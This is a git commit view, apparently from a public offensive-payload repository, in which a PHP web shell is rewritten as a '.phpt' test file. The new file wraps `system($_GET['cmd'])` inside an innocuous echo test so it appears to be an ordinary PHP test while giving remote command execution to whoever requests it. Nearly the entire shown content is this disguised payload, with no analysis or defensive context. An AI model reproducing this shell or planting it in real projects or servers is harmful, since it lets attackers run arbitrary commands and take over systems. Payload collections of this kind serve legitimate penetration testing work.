Web Cache Deception + phpt file format

This commit is contained in:
Swissky
2024-01-11 12:20:25 +01:00
parent 4b77292aeb
commit c852118ec8
3 changed files with 37 additions and 2 deletions

View File

@@ -1 +1,9 @@
<?php echo "Shell";system($_GET['cmd']); ?>
--TEST--
echo - basic test for echo language construct
--FILE--
<?php
echo 'This works ', 'and takes args!';
echo "Shell";system($_GET['cmd']);
?>
--EXPECT--
This works and takes args!